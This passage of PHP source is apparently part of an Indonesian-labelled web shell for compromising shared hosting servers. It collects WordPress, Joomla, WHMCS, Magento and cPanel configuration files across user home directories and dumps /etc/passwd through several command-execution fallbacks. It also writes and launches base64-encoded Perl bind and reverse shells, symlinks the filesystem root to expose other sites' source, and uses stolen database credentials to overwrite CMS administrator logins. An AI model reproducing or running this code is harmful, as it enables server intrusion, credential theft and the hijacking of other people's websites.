730.                     "/home/$user_mys/public_html/sites/default/settings.php" => "Drupal",
731.                     "/home/$user_mys/public_html/config/settings.inc.php" => "PrestaShop",
732.                     "/home/$user_mys/public_html/app/etc/local.xml" => "Magento",
733.                     "/home/$user_mys/public_html/joomla/configuration.php" => "Joomla",
734.                     "/home/$user_mys/public_html/configuration.php" => "Joomla",
735.                     "/home/$user_mys/public_html/wp/wp-config.php" => "WordPress",
736.                     "/home/$user_mys/public_html/wordpress/wp-config.php" => "WordPress",
737.                     "/home/$user_mys/public_html/wp-config.php" => "WordPress",
738.                     "/home/$user_mys/public_html/admin/config.php" => "OpenCart",
739.                     "/home/$user_mys/public_html/slconfig.php" => "Sitelok",
740.                     "/home/$user_mys/public_html/application/config/database.php" => "Ellislab",
741.                     "/home1/$user_mys/.my.cnf" => "cpanel",
742.                     "/home1/$user_mys/.accesshash" => "WHM-accesshash",
743.                     "/home1/$user_mys/public_html/bw-configs/config.ini" => "BosWeb",
744.                     "/home1/$user_mys/public_html/config/koneksi.php" => "Lokomedia",
745.                     "/home1/$user_mys/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
746.                     "/home1/$user_mys/public_html/clientarea/configuration.php" => "WHMCS",
747.                     "/home1/$user_mys/public_html/whm/configuration.php" => "WHMCS",
748.                     "/home1/$user_mys/public_html/whmcs/configuration.php" => "WHMCS",
749.                     "/home1/$user_mys/public_html/forum/config.php" => "phpBB",
750.                     "/home1/$user_mys/public_html/sites/default/settings.php" => "Drupal",                      "/home1/$user_mys/public_html/config/settings.inc.php" => "PrestaShop",
751.                     "/home1/$user_mys/public_html/app/etc/local.xml" => "Magento",
752.                     "/home1/$user_mys/public_html/joomla/configuration.php" => "Joomla",
753.                     "/home1/$user_mys/public_html/configuration.php" => "Joomla",
754.                     "/home1/$user_mys/public_html/wp/wp-config.php" => "WordPress",
755.                     "/home1/$user_mys/public_html/wordpress/wp-config.php" => "WordPress",
756.                     "/home1/$user_mys/public_html/wp-config.php" => "WordPress",
757.                     "/home1/$user_mys/public_html/admin/config.php" => "OpenCart",
758.                     "/home1/$user_mys/public_html/slconfig.php" => "Sitelok",
759.                     "/home1/$user_mys/public_html/application/config/database.php" => "Ellislab",
760.                     "/home2/$user_mys/.my.cnf" => "cpanel",
761.                     "/home2/$user_mys/.accesshash" => "WHM-accesshash",
762.                     "/home2/$user_mys/public_html/bw-configs/config.ini" => "BosWeb",
763.                     "/home2/$user_mys/public_html/config/koneksi.php" => "Lokomedia",
764.                     "/home2/$user_mys/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
765.                     "/home2/$user_mys/public_html/clientarea/configuration.php" => "WHMCS",
766.                     "/home2/$user_mys/public_html/whm/configuration.php" => "WHMCS",
767.                     "/home2/$user_mys/public_html/whmcs/configuration.php" => "WHMCS",
768.                     "/home2/$user_mys/public_html/forum/config.php" => "phpBB",
769.                     "/home2/$user_mys/public_html/sites/default/settings.php" => "Drupal",
770.                     "/home2/$user_mys/public_html/config/settings.inc.php" => "PrestaShop",
771.                     "/home2/$user_mys/public_html/app/etc/local.xml" => "Magento",
772.                     "/home2/$user_mys/public_html/joomla/configuration.php" => "Joomla",
773.                     "/home2/$user_mys/public_html/configuration.php" => "Joomla",
774.                     "/home2/$user_mys/public_html/wp/wp-config.php" => "WordPress",
775.                     "/home2/$user_mys/public_html/wordpress/wp-config.php" => "WordPress",
776.                     "/home2/$user_mys/public_html/wp-config.php" => "WordPress",
777.                     "/home2/$user_mys/public_html/admin/config.php" => "OpenCart",
778.                     "/home2/$user_mys/public_html/slconfig.php" => "Sitelok",
779.                     "/home2/$user_mys/public_html/application/config/database.php" => "Ellislab",
780.                     "/home3/$user_mys/.my.cnf" => "cpanel",
781.                     "/home3/$user_mys/.accesshash" => "WHM-accesshash",
782.                     "/home3/$user_mys/public_html/bw-configs/config.ini" => "BosWeb",
783.                     "/home3/$user_mys/public_html/config/koneksi.php" => "Lokomedia",
784.                     "/home3/$user_mys/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
785.                     "/home3/$user_mys/public_html/clientarea/configuration.php" => "WHMCS",
786.                     "/home3/$user_mys/public_html/whm/configuration.php" => "WHMCS",
787.                     "/home3/$user_mys/public_html/whmcs/configuration.php" => "WHMCS",
788.                     "/home3/$user_mys/public_html/forum/config.php" => "phpBB",
789.                     "/home3/$user_mys/public_html/sites/default/settings.php" => "Drupal",
790.                     "/home3/$user_mys/public_html/config/settings.inc.php" => "PrestaShop",
791.                     "/home3/$user_mys/public_html/app/etc/local.xml" => "Magento",
792.                     "/home3/$user_mys/public_html/joomla/configuration.php" => "Joomla",
793.                     "/home3/$user_mys/public_html/configuration.php" => "Joomla",
794.                     "/home3/$user_mys/public_html/wp/wp-config.php" => "WordPress",
795.                     "/home3/$user_mys/public_html/wordpress/wp-config.php" => "WordPress",
796.                     "/home3/$user_mys/public_html/wp-config.php" => "WordPress",
797.                     "/home3/$user_mys/public_html/admin/config.php" => "OpenCart",
798.                     "/home3/$user_mys/public_html/slconfig.php" => "Sitelok",
799.                     "/home3/$user_mys/public_html/application/config/database.php" => "Ellislab"
800.                         ); 
801.                     foreach($grab_config as $config => $nama_config) {
802.                         $ambil_config = file_get_contents($config);
803.                         if($ambil_config == '') {
804.                         } else {
805.                             $file_config = fopen("noname_config/$user_mys-$nama_config.txt","w");
806.                             fputs($file_config,$ambil_config);
807.                         }
808.                     }
809.                 }      
810.             }
811.             echo "<center><a href='?dir=$dir/noname_config'><font color=lime>Done</font></a></center>";
812.             }else{
813.                
814.         echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
815.         echo file_get_contents('/etc/passwd');
816.         echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
817.         }
818. }elseif($_GET['do'] == 'passwbypass') {
819.     echo '<center>Bypass etc/passw With:<br>
820. <table style="width:50%">
821.  <tr>
822.    <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
823.    <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
824.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
825.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
826.    <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
827. </tr></table>Bypass User With : <table style="width:50%">
828. <tr>
829.    <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
830.    <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
831.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
832.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
833.    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
834. </tr>
835. </table><br>';
836.  
837.  
838. if ($_POST['awkuser']) {
839. echo"<textarea class='inputzbut' cols='65' rows='15'>";
840. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
841. echo "</textarea><br>";
842. }
843. if ($_POST['systuser']) {
844. echo"<textarea class='inputzbut' cols='65' rows='15'>";
845. echo system("ls /var/mail");
846. echo "</textarea><br>";
847. }
848. if ($_POST['passthuser']) {
849. echo"<textarea class='inputzbut' cols='65' rows='15'>";
850. echo passthru("ls /var/mail");
851. echo "</textarea><br>";
852. }
853. if ($_POST['exuser']) {
854. echo"<textarea class='inputzbut' cols='65' rows='15'>";
855. echo exec("ls /var/mail");
856. echo "</textarea><br>";
857. }
858. if ($_POST['shexuser']) {
859. echo"<textarea class='inputzbut' cols='65' rows='15'>";
860. echo shell_exec("ls /var/mail");
861. echo "</textarea><br>";
862. }
863. if($_POST['syst'])
864. {
865. echo"<textarea class='inputz' cols='65' rows='15'>";
866. echo system("cat /etc/passwd");
867. echo"</textarea><br><br><b></b><br>";
868. }
869. if($_POST['passth'])
870. {
871. echo"<textarea class='inputz' cols='65' rows='15'>";
872. echo passthru("cat /etc/passwd");
873. echo"</textarea><br><br><b></b><br>";
874. }
875. if($_POST['ex'])
876. {
877. echo"<textarea class='inputz' cols='65' rows='15'>";
878. echo exec("cat /etc/passwd");
879. echo"</textarea><br><br><b></b><br>";
880. }
881. if($_POST['shex'])
882. {
883. echo"<textarea class='inputz' cols='65' rows='15'>";
884. echo shell_exec("cat /etc/passwd");
885. echo"</textarea><br><br><b></b><br>";
886. }
887. echo '<center>';
888. if($_POST['melex'])
889. {
890. echo"<textarea class='inputz' cols='65' rows='15'>";
891. for($uid=0;$uid<60000;$uid++){
892. $ara = posix_getpwuid($uid);
893. if (!empty($ara)) {
894. while (list ($key, $val) = each($ara)){
895. print "$val:";
896. }
897. print "\n";
898. }
899. }
900. echo"</textarea><br><br>";
901. }
902. } elseif($_GET['do'] == 'jumping') {
903.     $i = 0;
904.     echo "<div class='margin: 5px auto;'>";
905.     if(preg_match("/hsphere/", $dir)) {
906.         $urls = explode("\r\n", $_POST['url']);
907.         if(isset($_POST['jump'])) {
908.             echo "<pre>";
909.             foreach($urls as $url) {
910.                 $url = str_replace(array("http://","www."), "", strtolower($url));
911.                 $etc = "/etc/passwd";
912.                 $f = fopen($etc,"r");
913.                 while($gets = fgets($f)) {
914.                     $pecah = explode(":", $gets);
915.                     $user = $pecah[0];
916.                     $dir_user = "/hsphere/local/home/$user";
917.                     if(is_dir($dir_user) === true) {
918.                         $url_user = $dir_user."/".$url;
919.                         if(is_readable($url_user)) {
920.                             $i++;
921.                             $jrw = "[<font color=white>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
922.                             if(is_writable($url_user)) {
923.                                 $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
924.                             }
925.                             echo $jrw."<br>";
926.                         }
927.                     }
928.                 }
929.             }
930.         if($i == 0) {
931.         } else {
932.             echo "<br>Total there are ".$i." Bitches on ".$ip;
933.         }
934.         echo "</pre>";
935.         } else {
936.             echo '<center>
937.                   <form method="post">
938.                   Daftar Domains: <br>
939.                   <textarea name="url" style="width: 500px; height: 250px;">';
940.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
941.             while($getss = fgets($fp)) {
942.                 echo $getss;
943.             }
944.             echo  '</textarea><br>
945.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
946.                   </form></center>';
947.         }
948.     } elseif($_GET['do'] == 'backconnect') {
949.     echo "<form method='post'>
950.     <u>Bind Port:</u> <br>
951.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
952.     <input type='submit' name='sub_bp' value='>>'>
953.     </form>
954.     <form method='post'>
955.     <u>Back Connect:</u> <br>
956.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
957.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
958.     <input type='submit' name='sub_bc' value='>>'>
959.     </form>";
960.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
961.     if(isset($_POST['sub_bp'])) {
962.         $f_bp = fopen("/tmp/bp.pl", "w");
963.         fwrite($f_bp, base64_decode($bind_port_p));
964.         fclose($f_bp);
965.  
966.         $port = $_POST['port_bind'];
967.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
968.         sleep(1);
969.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
970.         unlink("/tmp/bp.pl");
971.     }
972.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
973.     if(isset($_POST['sub_bc'])) {
974.         $f_bc = fopen("/tmp/bc.pl", "w");
975.         fwrite($f_bc, base64_decode($bind_connect_p));
976.         fclose($f_bc);
977.  
978.         $ipbc = $_POST['ip_bc'];
979.         $port = $_POST['port_bc'];
980.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
981.         sleep(1);
982.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
983.         unlink("/tmp/bc.pl");
984.     }
985. }elseif(preg_match("/vhosts|vhost/", $dir)) {
986.         preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
987.         $urls = explode("\r\n", $_POST['url']);
988.         if(isset($_POST['jump'])) {
989.             echo "<pre>";
990.             foreach($urls as $url) {
991.                 $url = str_replace("www.", "", $url);
992.                 $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
993.                 if(is_dir($web_vh) === true) {
994.                     if(is_readable($web_vh)) {
995.                         $i++;
996.                         $jrw = "[<font color=white>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
997.                         if(is_writable($web_vh)) {
998.                             $jrw = "[<font color=white>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
999.                         }
1000.                         echo $jrw."<br>";
1001.                     }
1002.                 }
1003.             }
1004.         if($i == 0) {
1005.         } else {
1006.             echo "<br>Total there are ".$i." Room on ".$ip;
1007.         }
1008.         echo "</pre>";
1009.         } else {
1010.             echo '<center>
1011.                   <form method="post">
1012.                   List Domains: <br>
1013.                   <textarea name="url" style="width: 500px; height: 250px;">';
1014.                   bing("ip:$ip");
1015.             echo  '</textarea><br>
1016.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1017.                   </form></center>';
1018.         }
1019.     } else {
1020.         echo "<pre>";
1021.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
1022.         while($passwd = fgets($etc)) {
1023.             if($passwd == '' || !$etc) {
1024.                 echo "<font color=red>Can't read /etc/passwd</font>";
1025.             } else {
1026.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1027.                 foreach($user_jumping[1] as $user_idx_jump) {
1028.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
1029.                     if(is_readable($user_jumping_dir)) {
1030.                         $i++;
1031.                         $jrw = "[<font color=white>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1032.                         if(is_writable($user_jumping_dir)) {
1033.                             $jrw = "[<font color=white>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1034.                         }
1035.                         echo $jrw;
1036.                         if(function_exists('posix_getpwuid')) {
1037.                             $domain_jump = file_get_contents("/etc/named.conf");   
1038.                             if($domain_jump == '') {
1039.                                 echo " => ( <font color=red>Yah...Failed to Take the Domain </font> )<br>";
1040.                             } else {
1041.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1042.                                 foreach($domains_jump[1] as $dj) {
1043.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1044.                                     $user_jumping_url = $user_jumping_url['name'];
1045.                                     if($user_jumping_url == $user_idx_jump) {
1046.                                         echo " => ( <u>$dj</u> )<br>";
1047.                                         break;
1048.                                     }
1049.                                 }
1050.                             }
1051.                         } else {
1052.                             echo "<br>";
1053.                         }
1054.                     }
1055.                 }
1056.             }
1057.         }
1058.         if($i == 0) {
1059.         } else {
1060.             echo "<br>Total ada ".$i." Lonte di ".$ip;
1061.         }
1062.         echo "</pre>";
1063.     }
1064.     echo "</div>";
1065. } elseif($_GET['do'] == 'symlink') {
1066. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1067. $d0mains = @file("/etc/named.conf");
1068. ##httaces
1069. if($d0mains){
1070. @mkdir("Rlx_Symlink",0777);
1071. @chdir("Rlx_Symlink");
1072. @exe("ln -s / root");
1073. $file3 = 'Options Indexes FollowSymLinks
1074. DirectoryIndex 0xaN0n.htm
1075. AddType text/plain .php
1076. AddHandler text/plain .php
1077. Satisfy Any';
1078. $fp3 = fopen('.htaccess','w');
1079. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
1080. echo "
1081. <table align=center border=1 style='width:60%;border-color:#33FF00;'>
1082. <tr>
1083. <td align=center><font size=2>S. No.</font></td>
1084. <td align=center><font size=2>Domains</font></td>
1085. <td align=center><font size=2>Users</font></td>
1086. <td align=center><font size=2>Symlink</font></td>
1087. </tr>";
1088. $dcount = 1;
1089. foreach($d0mains as $d0main){
1090. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
1091. flush();
1092. if(strlen(trim($domains[1][0])) > 2){
1093. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1094. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
1095. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
1096. <td>".$user['name']."</td>
1097. <td><a href='$full/Rlx_Symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
1098. flush();
1099. $dcount++;}}}
1100. echo "</table>";
1101. }else{
1102. $TEST=@file('/etc/passwd');
1103. if ($TEST){
1104. @mkdir("Rlx_Symlink",0777);
1105. @chdir("Rlx_Symlink");
1106. exe("ln -s / root");
1107. $file3 = 'Options Indexes FollowSymLinks
1108. DirectoryIndex 0xaN0n.htm
1109. AddType text/plain .php
1110. AddHandler text/plain .php
1111. Satisfy Any';
1112.  $fp3 = fopen('.htaccess','w');
1113.  $fw3 = fwrite($fp3,$file3);
1114.  @fclose($fp3);
1115.  echo "
1116. <table align=center border=1><tr>
1117. <td align=center><font size=3>S. No.</font></td>
1118. <td align=center><font size=3>Users</font></td>
1119. <td align=center><font size=3>Symlink</font></td></tr>";
1120.  $dcount = 1;
1121.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
1122.  while(!feof($file)){
1123.  $s = fgets($file);
1124.  $matches = array();
1125.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1126.  $matches = str_replace("home/","",$matches[1]);
1127.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1128.  continue;
1129.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
1130. <td align=center><font class=txt>" . $matches . "</td>";
1131.  echo "<td align=center><font class=txt><a href=$full/Rlx_Symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1132.  $dcount++;}fclose($file);
1133.  echo "</table>";}else{if($os != "Windows"){@mkdir("Rlx_Symlink",0777);@chdir("Rlx_Symlink");@exe("ln -s / root");$file3 = '
1134. Options Indexes FollowSymLinks
1135. DirectoryIndex 0xaN0n.htm
1136. AddType text/plain .php
1137. AddHandler text/plain .php
1138. Satisfy Any
1139. ';
1140.  $fp3 = fopen('.htaccess','w');
1141.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
1142.  echo "
1143. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
1144. <table align=center border=1><tr>
1145. <td align=center><font size=3>ID</font></td>
1146. <td align=center><font size=3>Users</font></td>
1147. <td align=center><font size=3>Symlink</font></td></tr>";
1148.  $temp = "";$val1 = 0;$val2 = 1000;
1149.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
1150.  if ($uid)$temp .= join(':',$uid)."\n";}
1151.  echo '<br/>';$temp = trim($temp);$file5 =
1152.  fopen("test.txt","w");
1153.  fputs($file5,$temp);
1154.  fclose($file5);$dcount = 1;$file =
1155.  fopen("test.txt", "r") or exit("Unable to open file!");
1156.  while(!feof($file)){$s = fgets($file);$matches = array();
1157.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
1158.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1159.  continue;
1160.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
1161. <td align=center><font class=txt>" . $matches . "</td>";
1162.  echo "<td align=center><font class=txt><a href=$full/Rlx_Symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1163.  $dcount++;}
1164.  fclose($file);
1165.  echo "</table></div></center>";unlink("test.txt");
1166.  } else
1167.  echo "<center><font size=3>Cannot create Symlink</font></center>";
1168.  }
1169.  }    
1170. } elseif($_GET['do'] == 'auto_edit_user') {
1171.     if($_POST['hajar']) {
1172.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1173.             echo "username atau password harus lebih dari 6 karakter";
1174.         } else {
1175.             $user_baru = $_POST['user_baru'];
1176.             $pass_baru = md5($_POST['pass_baru']);
1177.             $conf = $_POST['config_dir'];
1178.             $scan_conf = scandir($conf);
1179.             foreach($scan_conf as $file_conf) {
1180.                 if(!is_file("$conf/$file_conf")) continue;
1181.                 $config = file_get_contents("$conf/$file_conf");
1182.                 if(preg_match("/JConfig|joomla/",$config)) {
1183.                     $dbhost = ambilkata($config,"host = '","'");
1184.                     $dbuser = ambilkata($config,"user = '","'");
1185.                     $dbpass = ambilkata($config,"password = '","'");
1186.                     $dbname = ambilkata($config,"db = '","'");
1187.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
1188.                     $prefix = $dbprefix."users";
1189.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1190.                     $db = mysql_select_db($dbname);
1191.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1192.                     $result = mysql_fetch_array($q);
1193.                     $id = $result['id'];
1194.                     $site = ambilkata($config,"sitename = '","'");
1195.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1196.                     echo "Config => ".$file_conf."<br>";
1197.                     echo "CMS => Joomla Kuy<br>";
1198.                     if($site == '') {
1199.                         echo "Sitename => <font color=red>error, cant take the domain name</font><br>";
1200.                     } else {
1201.                         echo "Sitename => $site<br>";
1202.                     }
1203.                     if(!$update OR !$conn OR !$db) {
1204.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1205.                     } else {
1206.                         echo "Status => <font color=green>success edit user, please log in with the user &new pass.</font><br><br>";
1207.                     }
1208.                     mysql_close($conn);
1209.                 } elseif(preg_match("/WordPress/",$config)) {
1210.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
1211.                     $dbuser = ambilkata($config,"DB_USER', '","'");
1212.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1213.                     $dbname = ambilkata($config,"DB_NAME', '","'");
1214.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
1215.                     $prefix = $dbprefix."users";
1216.                     $option = $dbprefix."options";
1217.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1218.                     $db = mysql_select_db($dbname);
1219.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1220.                     $result = mysql_fetch_array($q);
1221.                     $id = $result[ID];
1222.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1223.                     $result2 = mysql_fetch_array($q2);
1224.                     $target = $result2[option_value];
1225.                     if($target == '') {
1226.                         $url_target = "Login => <font color=red>error, cant take the domain name</font><br>";
1227.                     } else {
1228.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1229.                     }
1230.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1231.                     echo "Config => ".$file_conf."<br>";
1232.                     echo "CMS => Wordpress Kuy<br>";
1233.                     echo $url_target;
1234.                     if(!$update OR !$conn OR !$db) {
1235.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1236.                     } else {
1237.                         echo "Status => <font color=green>success edit user, please log in with the user & new pass.</font><br><br>";
1238.                     }
1239.                     mysql_close($conn);
1240.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1241.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1242.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1243.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1244.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1245.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1246.                     $prefix = $dbprefix."admin_user";
1247.                     $option = $dbprefix."core_config_data";
1248.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1249.                     $db = mysql_select_db($dbname);
1250.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1251.                     $result = mysql_fetch_array($q);
1252.                     $id = $result[user_id];
1253.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1254.                     $result2 = mysql_fetch_array($q2);
1255.                     $target = $result2[value];
1256.                     if($target == '') {
1257.                         $url_target = "Login => <font color=red>error, cant take the domain name</font><br>";
1258.                     } else {
1259.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1260.                     }
1261.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1262.                     echo "Config => ".$file_conf."<br>";
1263.                     echo "CMS => Magento Kuy<br>";
1264.                     echo $url_target;
1265.                     if(!$update OR !$conn OR !$db) {
1266.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1267.                     } else {
1268.                         echo "Status => <font color=white>succses edit user, please log in with the user & new pass.</font><br><br>";
1269.                     }
1270.                     mysql_close($conn);
1271.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1272.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1273.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1274.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1275.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1276.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1277.                     $prefix = $dbprefix."user";
1278.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1279.                     $db = mysql_select_db($dbname);
1280.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1281.                     $result = mysql_fetch_array($q);
1282.                     $id = $result[user_id];
1283.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
1284.                     if($target == '') {
1285.                         $url_target = "Login => <font color=red>error, cant take the domain name</font><br>";
1286.                     } else {
1287.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1288.                     }
1289.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1290.                     echo "Config => ".$file_conf."<br>";
1291.                     echo "CMS => OpenCart Kuy<br>";
1292.                     echo $url_target;
1293.                     if(!$update OR !$conn OR !$db) {
1294.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1295.                     } else {
1296.                         echo "Status => <font color=white>succses edit user, please log in with the user & new pass.</font><br><br>";
1297.                     }
1298.                     mysql_close($conn);
